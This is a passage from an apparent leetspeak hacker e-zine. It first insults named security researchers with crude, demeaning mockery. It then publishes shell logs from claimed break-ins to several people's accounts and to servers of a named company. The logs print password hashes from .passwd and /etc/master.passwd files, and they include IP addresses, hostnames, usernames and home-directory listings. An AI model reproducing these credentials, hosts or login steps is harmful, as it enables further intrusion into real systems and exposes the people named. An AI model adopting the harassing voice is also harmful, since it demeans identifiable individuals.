th4nkz t0 kunz (aka absynth) 0f th3 h4rd3n3d-php s3cur1ty t34m f0r 4ll0w1ng h1z
s1t3 t0 run l1k3 3v3ry vuln3r4bl3 w3b4pp 1n th3 l4zt 6 y34rz & f0r b31ng t0
stup1d t0 fuck1ng n0t1c3 th3 br34k 1n.
26.txt -~-~-~ 4ud1t1ng th3 h4q3rz m1nd
4ud1t1ng th3 h4q3r m1nd.
by MRH- (H 1z 4 h4q3r!)
h3y h3y h3y!!! w3lc0m3 t0 my t3xt 1n th3 h0no z1n3. 3y3 y4m t00 stup1d t0 wr1t3
a full b00k, s0 h0no l3t m3 wr1t3 th1z sh0rt t3xt s0 th4t th3 s3cur1ty w0rld
w1ll kn0w h0w t0 sp0t a tru3 h4q3r. f1rzt th1ng t0 kn0w.. h4q3rz r 0n uz3n3t.
s3c0nd.. h4q3rz uz3 c0d3z. th1rd.. 3y3 y4m a h4q3r!!! h4 h4 h4.
-~-~-~
n0w l3tz b3g1n. h4q3r subj3ct numb3r 0n3: HDM (H4lf D3v3l0p3d M1dg3t)
th1z h4q3r st4ndz t4ll @ 5 ft 1 1nch3z. d0nt l3t h1z g3ll3d h41r f00l y0u, h3 tru3ly 1z
tr41l3r p4rk tr4sh. tr33t0p tr41l3r p4rk 1z wh3r3 h3 1zt l34rn3d t0 c0d3. 1t w4z th3r3
th4t th3 m1dg3t m3t h1z l1f3 t1m3 c0mp4n10n & c0d1ng buddy, sp00nm. t0g3th3r th3y s4t
4r0und 4 d4yz try1ng t0 h4q 1mmun1tys3c, but s33mz l1k3 th3y c0uldnt must3r th3 4b1l1t13z.
th3r3 c4z3 1z tru3ly un1qu3 1n th4t 1nzt34d 0f g1v1ng up t0 b3c0m3 a du0 0f m4l3 str1pp3rz
th3 t34m w3nt 0n t0 b3c0m3 w0rld f4m0uz 4uth0rz 0f th3 m3t4spl01t pr0j3ct!! 3y3 p3rs0n4lly
h4v3 uz3d th1z t00l t0 d0 4ll 0f my h4q1ng.
3y3 c4ught up w1th th3 gr34t HDM & sp00nm @ d3fc0n l4zt y34r. h3r3 1z 4 gl1ms3
1nt0 th31r w0rld.
HDM: "I beat up little kids and then spike my hair."
spoonm: "my mother beat me."
4z y0u c4n s33, th3r3 1z a r34s0n th3z3 2 h4lf br41n3d h4q3rz s33k m0r3
4tt3nt10n th4n r3dp4ntz 0n a sug4r buzz! 1f y0u h4v3 s33n 0r h34rd fr0m
sp00nm'z m0th3r, plz c0nt4ct MRX@whatever-company-kf-is-currently-failing-at.com
-~-~-~
n3xt subj3ct 1z a w3ll kn0wn s0uth 4fr1c4n h4q3r by th3 n4m3 0f awk.
awk 1z kn0wn t0 ch3w 0n pur3 st33l t0 h3lp "t0ugh3n up" h1z gumz. h3 41nt t0
puzzy! 3y3 0nc3 w4tch3d h1m k1ckb4n kokanin fr0m #darknet!! 1t 1z rum0r3d th4t
awk'z d1q c4n w1thst4nd t0rtur3z 0nly pr3v10uzly kn0wn t0 b0b fl4n4g4n. h0w much
0f th1z m4n 1z myth th0ugh? I c4ught awk 0n th3 3r1z fr33 ch4t n3tw0rk t0 4sk
h1m a qu3st10n..
<MRH-> h0w b1g r y0ur b4llz do0d?
<awk> GFRRRRAWWWLL!!@#!@# ME BALLS !@#!@# HURT!!!!@#!@#! GRRRRRRWAAWWWWLL!L@#
<awk> FEED AWK!@#!@# PROTIEN!!!!##
<awk> GRRRAAWWRRRLLL!!!#$#$%%%
th3 0nly l0g1c4l 4ssumpt10n 0n3 c4n m4k3 1z th4t awk w4z l4t3 1n d3c3nd1ng fr0m
th3 4p3 f4m1ly, 4ls0 h1z l0w 1q t3llz uz th4t h3 pr0b4bly h4z a m1zz1ng
chr0m0z0m3.
-~-~-~
0ur f1rzt tru3ly m4rv4louz subj3ct g03z by th3 h4ndl3 agntorng.
unl1k3 th3 def0l14nt, th1z agntorng 1z h4rml3zz. g1v3n th3 ch01c3 b3tw33n h4q1ng
& m4k1ng upst0r13z th1z 1nt3rn3t h3r0 w1ll p1q st0ryz 3v3ryt1m3! wh4t a h4q3r!
1z 1t th4t h3 c4nt h4q? 1z 1t th4t h3 1z a "p0z3r" 4z h3 w0uld s4y? 3y3 th1nk
s0! 1t 1z my c0nclus10n th4t s0m3 hum4nz, g1v3n 3n0ugh l4m3n3zz 4dd3d t0 th31r
3nv1r0nm3nt phys1c4lly c4nn0t h4q!! b31ng th4t agntorng h4z b33n 3xp0z3d t0 th3
d4rp4 1rcd f0r 4n 3xt3nd3d 4m0unt 0f t1m3.. 3y3 b3li3v3 h3 1z h4q1ng imp0t3nt!
3y3 4sk3d agntorng th1z wh3n h3 w4z 0n mushr00mz 1rc1ng fr0m an 0wn3d sh3ll b0x.
<agntorng> I cant feel my legs.
<agntorng> I think h0no hacked them!
<agntorng> oh well.. I'll sit around an irc tomorrow.
h0no d1d n0t h4q th3m. 1t turnz 0ut th4t agntorng 1z suff3r1ng fr0m wh4t w3 1n
th3 buz1n3zz c4ll "p4r4n01d 3y3 y4m h4q3d syndr0m". h3 b3l13v3z th1z t0 such 4n
3xt3nt th4t h3 0ft3n t1m3z sw1tch3z sh3llz 3 t0 4 t1m3z 4n h0ur juzt 1nc4z3 h0no
0wnz a b0x.
h0no h4z 1nf0rm3d m3 th4t f0ll0w1ng agntorng'z gu1d3 t0 4dv01d1ng g3tt1ng 0wn3d
w1ll 0nly result 1n m0r3 st34lthy m3th0dz f0r b4qd00r1ng. 4nd th3y w1sh t0 4sk
h1m th1z "how long were you fuqn owned for?" th3y b3li3v3 th3 4nsw3r 1z "to
this day." s1nc3 3y3 y4m 4n 3xp3rt @ 4n4lys1s, 3y3 w1ll d3t3rm1n3 th4t th3y m34n
t0 s4y:
AGNTORNG. YOU ARE OWNED!!! HAR HAR HAR!!!@#
27.txt -~-~-~ DVDM4N 1Z A FUQN FR34K!!@#
b3 f0r3w4rn3d. th1z 1z th3 gr34t3zt h4q 3v3r t0 t4k3 pl4c3 0n th3 1nt3rn3t. w3
4lm0zt f33l b4d f0r d01ng th1z t0 4n0th3r hum4n b31ng...
-~-~-~
h0no pr3s3ntz... DVDMAN 1Z A FUQN FR34K!!@#
-~-~-~
w3 w1ll st4rt y0u 0ff w1th dvdman's light.volthost.net 4cc0unt:
$ ls -al
total 105458
drwx--x--- 9 dvdman free 1024 Jul 10 02:40 .
drwxr-xr-x 97 root wheel 2048 Jul 20 22:55 ..
drwx------ 3 dvdman free 512 Jun 21 00:10 .BitchX
-rw------- 1 dvdman free 17075 Jul 10 12:30 .bash_history
-rw-r--r-- 1 dvdman free 771 Apr 21 2005 .cshrc
drwx------ 2 dvdman free 512 Jul 4 13:28 .irssi
-rw-r--r-- 1 dvdman free 255 Apr 21 2005 .login
-rw-r--r-- 1 dvdman free 165 Apr 21 2005 .login_conf
-rw------- 1 dvdman free 371 Apr 21 2005 .mail_aliases
-rw-r--r-- 1 dvdman free 331 Apr 21 2005 .mailrc
-rw------- 1 dvdman free 606 May 11 2005 .mysql_history
-rw-r--r-- 1 dvdman free 45 May 12 2005 .passwd
-rw-r--r-- 1 dvdman free 801 Apr 21 2005 .profile
-rw------- 1 dvdman free 276 Apr 21 2005 .rhosts
-rw-r--r-- 1 dvdman free 852 Apr 21 2005 .shrc
drwx------ 2 dvdman free 512 May 6 2005 .ssh
-rw-r--r-- 1 dvdman free 786432 Jul 10 01:37 X-05BL_060609_352eubx_api_au_1.bin
drwxr-xr-x 2 dvdman free 512 Jun 22 2005 gals.fraek.com
-rw-r--r-- 1 dvdman free 7188480 Jun 22 2005 galsfraek.tar
-rw-r--r-- 1 dvdman free 73474 Jul 10 01:07 n2edit_beta9.zip
drwxrwxrwx 2 dvdman free 512 May 5 2005 output
drwxr-xr-x 9 dvdman free 512 Jun 21 01:29 public_html
-rwxr-xr-x 1 dvdman free 184 May 5 2005 run.sh
-rw-r--r-- 1 dvdman free 99788800 Jun 22 2005 sexyfreak.tar
drwxr-xr-x 4 dvdman free 512 Sep 12 2005 vidaguerra
$ cat .passwd
dvdman:$apr1$7dGho/..$kvC5BJc11zxk3qEnokOYg/
-bash-3.00# ssh johnh@light.volthost.net
-
All failed password attempts are logged.
We will report multiple failed attempts.
-
johnh@light.volthost.net's password:
$ id
uid=2111(johnh) gid=2000(free) groups=2000(free)
$ ps aux
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 85874 0.0 0.1 1852 1448 ?? Ss Wed03PM 0:05.43 screen
johnh 95791 0.0 0.3 8356 5536 q2 S+ Thu02PM 0:34.52 irssi -h rate.limi
johnh 65902 0.0 0.1 1868 1500 pq Is+ Thu08AM 0:00.06 /usr/local/bin/bas
johnh 85875 0.0 0.1 1820 1424 q2 Is Wed03PM 0:00.01 /usr/local/bin/bas
johnh 35056 0.0 0.0 400 236 ?? R 5:05PM 0:00.00 ps aux
$ ls -al
total 118
drwx--x--- 9 johnh free 512 Jun 27 12:31 .
drwxr-xr-x 97 root wheel 2048 Jul 20 22:55 ..
drwx------ 3 johnh free 512 Jun 21 02:19 .BitchX
-rw------- 1 johnh free 10301 Jul 21 15:48 .bash_history
-rw-r--r-- 1 johnh free 771 Jun 21 00:29 .cshrc
drwx------ 2 johnh free 512 Jul 4 22:25 .irssi
-rw-r--r-- 1 johnh free 255 Jun 21 00:29 .login
-rw-r--r-- 1 johnh free 165 Jun 21 00:29 .login_conf
-rw------- 1 johnh free 371 Jun 21 00:29 .mail_aliases
-rw-r--r-- 1 johnh free 331 Jun 21 00:29 .mailrc
-rw------- 1 johnh free 32 Jun 21 17:46 .mysql_history
-rw-r--r-- 1 johnh free 68 Jun 27 12:32 .passwd
-rw-r--r-- 1 johnh free 801 Jun 21 00:29 .profile
-rw------- 1 johnh free 276 Jun 21 00:29 .rhosts
-rw-r--r-- 1 johnh free 852 Jun 21 00:29 .shrc
drwx------ 2 johnh free 512 Jun 23 15:11 .ssh
drwx------ 5 johnh free 512 Jul 10 08:16 irclogs
lrwxr-xr-x 1 root free 26 Jun 21 00:37 jbhale.com -> /home/www/sites/jbhale.com
-rw-r--r-- 1 johnh free 53626 Mar 27 2004 mb2md-3.20.pl
drwxr-xr-x 4 johnh free 512 Jun 21 09:13 nc
drwxr-xr-x 4 johnh free 512 Jun 21 08:40 others
drwxr-xr-x 2 johnh free 512 Jul 10 01:00 public_html
-rw-r--r-- 1 johnh free 13808 Jun 24 16:57 rom102-v28-rev109-0001-blocker.zip
$ cd irclogs
$ ls -alR
total 10
drwx------ 5 johnh free 512 Jul 10 08:16 .
drwx--x--- 9 johnh free 512 Jun 27 12:31 ..
drwx------ 2 johnh free 512 Jul 4 14:40 scnet
drwx------ 2 johnh free 512 Jul 12 11:10 servercentral
drwx------ 2 johnh free 1024 Jul 20 15:32 uicn
./scnet:
total 3762
-rw------- 1 johnh free 20445 Jul 10 03:00 #!l33tsecurity.log
-rw------- 1 johnh free 954489 Jul 10 03:00 #efnet.log
-rw------- 1 johnh free 2491175 Jul 10 03:00 #nanog.log
-rw------- 1 johnh free 262940 Jul 10 03:00 #voltshells.log
drwx------ 2 johnh free 512 Jul 4 14:40 .
drwx------ 5 johnh free 512 Jul 10 08:16 ..
-rw------- 1 johnh free 381 Jul 4 22:23 alums-.log
-rw------- 1 johnh free 3562 Jul 10 03:30 auth.log
-rw------- 1 johnh free 2153 Jun 27 02:58 dvdman.log
-rw------- 1 johnh free 4217 Jun 24 23:33 joel.log
-rw------- 1 johnh free 163 Jun 29 09:24 kiles-.log
-rw------- 1 johnh free 5678 Jul 8 19:03 momo.log
-rw------- 1 johnh free 262 Jul 2 03:53 sweet}{li.log
./servercentral:
total 288
-rw------- 1 johnh free 2576 Jul 12 09:45 #!l33tsecurity.log
-rw------- 1 johnh free 254953 Jul 12 09:45 #nanog.log
drwx------ 2 johnh free 512 Jul 12 11:10 .
drwx------ 5 johnh free 512 Jul 10 08:16 ..
-rw------- 1 johnh free 2244 Jul 16 23:04 auth.log
-rw------- 1 johnh free 146 Jul 12 11:15 johnh.log
-rw------- 1 johnh free 1375 Jul 12 11:15 sc-notice.log
./uicn:
total 7014
-rw------- 1 johnh free 383 Jul 20 08:42 ##al7bar-help.log
-rw------- 1 johnh free 527 Jun 28 15:22 ##al7bar.tk.log
-rw------- 1 johnh free 720 Jul 20 08:42 #al7bar-help.log
-rw------- 1 johnh free 4795533 Jul 21 17:11 #al7bar.tk.log
-rw------- 1 johnh free 373 Jul 20 08:44 #alt7bar.tk.log
-rw------- 1 johnh free 657717 Jun 29 19:15 #dishnetwork.log
-rw------- 1 johnh free 1307717 Jul 2 00:59 #dss-newbies.log
-rw------- 1 johnh free 369 Jul 2 00:58 #pansat.log
drwx------ 2 johnh free 1024 Jul 20 15:32 .
drwx------ 5 johnh free 512 Jul 10 08:16 ..
-rw-r--r-- 1 johnh free 143669 Jul 20 08:48 A
-rw------- 1 johnh free 3390 Jul 20 08:43 [c3p0].log
-rw------- 1 johnh free 10919 Jul 20 14:50 auth.log
-rw------- 1 johnh free 585 Jul 20 21:40 bar-bee-q.log
-rw------- 1 johnh free 176 Jun 29 01:26 candoo.log
-rw------- 1 johnh free 129 Jun 28 23:46 cra.log
-rw------- 1 johnh free 2276 Jun 29 02:27 crazyhorse.log
-rw------- 1 johnh free 1660 Jul 20 14:44 demigawd.log
-rw------- 1 johnh free 326 Jun 28 22:07 expatriat.log
-rw------- 1 johnh free 181 Jul 20 08:43 ftamoyahua.log
-rw------- 1 johnh free 41700 Jul 20 20:02 global.log
-rw------- 1 johnh free 2765 Jun 29 00:07 hackdss.log
-rw------- 1 johnh free 243 Jun 28 17:32 hackinsat.log
-rw------- 1 johnh free 2701 Jul 20 08:51 huckleberry.log
-rw------- 1 johnh free 974 Jun 26 17:45 huggybear.log
-rw------- 1 johnh free 737 Jun 25 17:50 j.log
-rw------- 1 johnh free 1211 Jul 20 13:51 john.log
-rw------- 1 johnh free 13495 Jul 20 14:50 johnh.log
-rw------- 1 johnh free 4392 Jul 19 20:17 link.log
-rw------- 1 johnh free 160 Jun 25 01:19 moneey.log
-rw------- 1 johnh free 440 Jun 26 15:27 mud.log
-rw------- 1 johnh free 212 Jul 20 14:51 nailer.log
-rw------- 1 johnh free 640 Jun 26 21:37 nexus.log
-rw------- 1 johnh free 16285 Jul 20 14:44 nickserv.log
-rw------- 1 johnh free 4195 Jul 21 01:19 night^owl.log
-rw------- 1 johnh free 10440 Jul 20 13:50 operserv.log
-rw------- 1 johnh free 6240 Jul 20 14:50 opsb.log
-rw------- 1 johnh free 314 Jul 20 15:32 perception.log
-rw------- 1 johnh free 409 Jun 29 01:29 red^neck.log
-rw------- 1 johnh free 325 Jun 28 17:54 rusty.log
-rw------- 1 johnh free 8463 Jul 20 14:50 secureserv.log
-rw------- 1 johnh free 307 Jul 20 14:51 shaggy.log
-rw------- 1 johnh free 176 Jun 28 21:53 showtime.log
-rw------- 1 johnh free 201 Jun 26 15:27 superjesus.log
-rw------- 1 johnh free 3974 Jun 27 03:01 topcon.log
n0t1c3 h0w dvdman l0gz h1z ch4tz.. s0undz l1k3 s0m3th1ng 4 n4rc w0uld d0!
-~-~-~
n0w 1t'z 4 w3ll kn0wn f4ct th4t dvdman 1z d33p 1n th3 sc3n3. h3
3v3n h4z a sh3ll 0n th3 w0rld r3n0wn undef.net!
-~-~-~
-bash-3.00# ssh john@undef.net
--------------------------------------------------------------
WARNING: PLEASE READ
--------------------------------------------------------------
UNAUTHORIZED ACCESS IS PROHIBITED.
(a) All access to, and activities on this system that are not
explicitly authorized by Greg Albrecht are considered
unauthorized.
(b) All access to, and activities on this system are logged.
(c) Unauthorized access to, and activities on this system will
be reported to the appropriate authorities.
--------------------------------------------------------------
Welcome to juanita.undef.net
Password:
$ w
9:25AM up 6:41, 2 users, load averages: 0.35, 0.35, 0.35
USER TTY FROM LOGIN@ IDLE WHAT
xty p3 63.130.185.162 6:34AM 2:51 -
xty p4 63.130.185.162 6:35AM 2:33 -
$ ls -al
total 3218
drwxr-xr-x 14 john john 1024 Jul 19 13:29 .
drwxr-xr-x 35 root wheel 2048 May 16 15:58 ..
drwx------ 5 john john 512 Jan 17 2005 .BitchX
lrwxrwxrwx 1 john john 9 Jul 14 2005 .bash_history -> /dev/null
-rw-r----- 1 john john 63 Dec 31 2004 .bash_logout
-rw-r----- 1 john john 216 Dec 31 2004 .bash_profile
-rw-r----- 1 john john 131 Dec 31 2004 .bashrc
-rw-r--r-- 1 john john 771 Dec 31 2004 .cshrc
lrwxrwxrwx 1 john john 9 Jul 14 2005 .forward -> /dev/null
drwx------ 2 john john 512 Jan 10 2005 .irssi
-rw-r--r-- 1 john john 7 Jun 12 01:35 .ispoof
-rw-r--r-- 1 john john 255 Dec 31 2004 .login
-rw-r--r-- 1 john john 165 Dec 31 2004 .login_conf
-rw------- 1 john john 371 Dec 31 2004 .mail_aliases
-rw-r--r-- 1 john john 331 Dec 31 2004 .mailrc
-rw-r--r-- 1 john john 26 Jun 12 01:35 .oidentd.conf
-rw-r--r-- 1 john john 801 Dec 31 2004 .profile
-rw------- 1 john john 276 Dec 31 2004 .rhosts
-rw-r----- 1 john john 3394 Dec 31 2004 .screenrc
lrwxrwxrwx 1 john john 9 Jul 14 2005 .sh_history -> /dev/null
lrwxrwxrwx 1 john john 9 Jul 14 2005 .shosts -> /dev/null
-rw-r--r-- 1 john john 852 Dec 31 2004 .shrc
drwx------ 4 john john 512 Jan 6 2005 .silc
drwx------ 2 john john 512 Feb 7 2005 .ssh
drwxr-xr-x 12 john john 1024 Jan 17 2005 BitchX
drwx------ 6 john john 512 Jun 9 08:04 Maildir
drwxr-xr-x 2 john john 512 Jan 17 2005 bin
drwxr-xr-x 2 john john 1024 Jun 2 06:51 bnc2.9.4
-rw-r--r-- 1 john john 76896 Feb 6 2005 bnc2.9.4.tar.gz
drwx------ 10 john john 512 Jan 2 2005 cyp
-rw-r--r-- 1 john john 68742 Jun 30 2003 cyp1.0k.tar.gz
-rw-r--r-- 1 john john 2532476 Mar 26 2004 ircii-pana-1.1-final.tar.gz
drwx-----x 3 john john 512 Jul 20 12:41 my_webpage
-rw-r--r-- 1 john john 179227 Jul 19 13:29 p
-rw-r--r-- 1 john john 312224 Jun 24 2004 psyBNC2.3.1.tar.gz
drwxr-xr-x 11 john john 512 Jun 13 08:09 psybnc
lrwxrwxrwx 1 john john 10 Jul 14 2005 public_html -> my_webpage
-rwxr-xr-x 1 john john 5178 Feb 3 2005 test
-rw-r--r-- 1 john john 115 Feb 3 2005 test.c
drwxr-xr-x 4 john john 512 Jul 20 12:41 ul
$ id
uid=1056(john) gid=1056(john) groups=1056(john)
y3z dvdman.. w3 g0t y0ur stup1d fuqn ip f1nd3r w4r3z.
(xt w0rkz w1th dvdman!!! th31r r3l4t10nsh1p m4y bl0ss0m 1nt0 s0m3th1ng m0r3..
k33p y0ur 3y3z p33l3d!@#)
-~-~-~
s0m3h0w dvdman g0t h1r3d by bangbros. 1f th3y 3v3n th1nk 4b0ut g1v1ng h1m a
g00d r3f3r3nc3 th3y w1ll b3 rm'd.
[root@hackerz.org]# ssh -l root 64.111.193.9
The authenticity of host '64.111.193.9 (64.111.193.9)' can't be established.
RSA key fingerprint is d7:d8:44:e6:70:39:40:c4:49:15:c3:6e:25:2c:af:6b.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '64.111.193.9' (RSA) to the list of known hosts.
root@64.111.193.9's password:
Last login: Tue Jul 19 10:07:48 2005
FreeBSD 5.3-RELEASE (GENERIC) #0: Fri Nov 5 04:19:18 UTC 2004
Welcome to FreeBSD!
Before seeking technical support, please use the following resources:
o Security advisories and updated errata information for all releases are
at http://www.FreeBSD.org/releases/ - always consult the ERRATA section
for your release first as it's updated frequently.
o The Handbook and FAQ documents are at http://www.FreeBSD.org/ and,
along with the mailing lists, can be searched by going to
http://www.FreeBSD.org/search/. If the doc distribution has
been installed, they're also available formatted in /usr/share/doc.
If you still have a question or problem, please take the output of
`uname -a', along with any relevant error messages, and email it
as a question to the questions@FreeBSD.org mailing list. If you are
unfamiliar with FreeBSD's directory layout, please refer to the hier(7)
manual page. If you are not familiar with manual pages, type `man man'.
You may also use sysinstall(8) to re-enter the installation and
configuration utility. Edit /etc/motd to change this login announcement.
%w
3:26AM up 67 days, 13:16, 1 user, load averages: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE WHAT
johnh p0 paysite 04Nov05 4days bash
%cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
#
root:$1$t/M3s1qW$qN9jZIr8RNqXqdCw/WrK9.:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
johnh:$1$P6.VYjXW$C1a25LaiPL6RwMRAJygaM0:1001:1001::0:0:John H:/home/johnh:/usr/local/bin/bash
gus:$1$84nQ7mp0$vCet0Ft4spM2m375KWIWD/:1002:1002::0:0:Gustavo:/home/gus:/usr/local/bin/bash
faccundo:$1$496JBQc0$ueeV1pV4T3o29eAL1C48p0:1003:1003::0:0:faccundo:/home/faccundo:/usr/local/bin/bash
%cd /home/johnh
%ls -al
total 716
drwxr-xr-x 4 johnh johnh 512 Oct 31 12:07 .
drwxr-xr-x 5 root wheel 512 Aug 8 11:52 ..
-rw------- 1 johnh johnh 3832 Nov 19 14:12 .bash_history
-rw-r--r-- 1 johnh johnh 767 Mar 25 2005 .cshrc
-rw-r--r-- 1 johnh johnh 248 Mar 25 2005 .login
-rw-r--r-- 1 johnh johnh 158 Mar 25 2005 .login_conf
-rw------- 1 johnh johnh 373 Mar 25 2005 .mail_aliases
-rw-r--r-- 1 johnh johnh 331 Mar 25 2005 .mailrc
-rw-r--r-- 1 johnh johnh 797 Mar 25 2005 .profile
-rw------- 1 johnh johnh 276 Mar 25 2005 .rhosts
-rw-r--r-- 1 johnh johnh 975 Mar 25 2005 .shrc
drwxr-xr-x 2 johnh johnh 512 Oct 26 16:18 .ssh
-rwxr-xr-x 1 johnh johnh 4955 Oct 27 21:47 a
-rw-r--r-- 1 johnh johnh 173 Oct 27 21:47 a.c
-rw------- 1 johnh johnh 299008 Oct 27 21:47 a.core
-rw-r--r-- 1 root johnh 117 Jun 3 2005 blah.sh
drwxr-xr-x 2 root johnh 512 Oct 31 12:07 debug
%uname -a
FreeBSD backup.bangbros.com 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
%ssh -l root 64.111.193.12
root@64.111.193.12's password:
Last login: Tue Jun 21 20:42:23 2005
FreeBSD 5.3-RELEASE (GENERIC) #0: Fri Nov 5 04:19:18 UTC 2004
Welcome to FreeBSD!
Before seeking technical support, please use the following resources:
o Security advisories and updated errata information for all releases are
at http://www.FreeBSD.org/releases/ - always consult the ERRATA section
for your release first as it's updated frequently.
o The Handbook and FAQ documents are at http://www.FreeBSD.org/ and,
along with the mailing lists, can be searched by going to
http://www.FreeBSD.org/search/. If the doc distribution has
been installed, they're also available formatted in /usr/share/doc.
If you still have a question or problem, please take the output of
`uname -a', along with any relevant error messages, and email it
as a question to the questions@FreeBSD.org mailing list. If you are
unfamiliar with FreeBSD's directory layout, please refer to the hier(7)
manual page. If you are not familiar with manual pages, type `man man'.
You may also use sysinstall(8) to re-enter the installation and
configuration utility. Edit /etc/motd to change this login announcement.
%uname -a
FreeBSD 2257i.bangbros.com 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
%cat /etc/master.mpasswd
# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
#
root:$1$nXG05sKx$oZZfgRYYgs4K5aFLLt/es.:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
johnh:$1$m1mMZ37N$2UdA4ThopQzCNuyWhapGn1:1001:1001::0:0:John:/home/johnh:/bin/sh
mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin
bbros2257:$1$mEii.TPy$ecXpN9WvsIBqUJYXb4QSs/:1002:1002::0:0:bangbros 2257:/home/bbros2257:/usr/local/bin/bash
%cd /home/johnh
%ls -al
total 128
drwxr-xr-x 4 johnh johnh 512 Sep 30 11:35 .
drwxr-xr-x 4 root wheel 512 Jun 10 2005 ..
-rw------- 1 johnh johnh 135 Sep 28 18:05 .bash_history
-rw-r--r-- 1 johnh johnh 767 Jun 10 2005 .cshrc
-rw-r--r-- 1 johnh johnh 248 Jun 10 2005 .login
-rw-r--r-- 1 johnh johnh 158 Jun 10 2005 .login_conf
-rw------- 1 johnh johnh 373 Jun 10 2005 .mail_aliases
-rw-r--r-- 1 johnh johnh 331 Jun 10 2005 .mailrc
-rw-r--r-- 1 johnh johnh 797 Jun 10 2005 .profile
-rw------- 1 johnh johnh 276 Jun 10 2005 .rhosts
-rw-r--r-- 1 johnh johnh 975 Jun 10 2005 .shrc
drwx------ 2 johnh johnh 512 Jun 10 2005 .ssh
-rwxr-xr-x 1 johnh johnh 38462 Sep 30 11:06 php.ini
drwxrwxrwx 3 root johnh 512 Sep 30 12:09 public_html
%exit
logout
Connection to 64.111.193.12 closed.
%exit
logout
Connection to 64.111.193.9 closed.
pr3tty funny h0w dvdman w4z th3 r34s0n bangbros g0t 0wn3d..
h1m b31ng th3 s3cur1ty 4dm1n & 4ll.
-~-~-~
$ uname -a
FreeBSD John.Bangbros.com 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Mon Jun 6 13:27:56 EDT 2005 root@John.Bangbros.com:/usr/obj/usr/src/sys/DUMMYNET i386
$ id
uid=1004(dvdman) gid=1004(dvdman) groups=1004(dvdman)
$ ls -al
total 384
drwxr-xr-x 8 dvdman dvdman 512 Aug 30 09:33 .
drwxr-xr-x 11 root wheel 512 Jul 14 11:54 ..
drwx------ 3 dvdman dvdman 512 Apr 5 2005 .BitchX
-rw------- 1 dvdman dvdman 5647 Nov 17 13:42 .bash_history
-rw-r--r-- 1 dvdman dvdman 767 Mar 30 2005 .cshrc
-rw-r--r-- 1 dvdman dvdman 5 Dec 28 11:14 .ispoof
-rw-r--r-- 1 dvdman dvdman 248 Mar 30 2005 .login
-rw-r--r-- 1 dvdman dvdman 158 Mar 30 2005 .login_conf
-rw------- 1 dvdman dvdman 373 Mar 30 2005 .mail_aliases
-rw-r--r-- 1 dvdman dvdman 331 Mar 30 2005 .mailrc
-rw------- 1 dvdman dvdman 2763 Sep 1 13:35 .mysql_history
-rw-r--r-- 1 dvdman dvdman 24 Dec 28 11:14 .oidentd.conf
-rw-r--r-- 1 root dvdman 103 Aug 30 15:29 .passwd
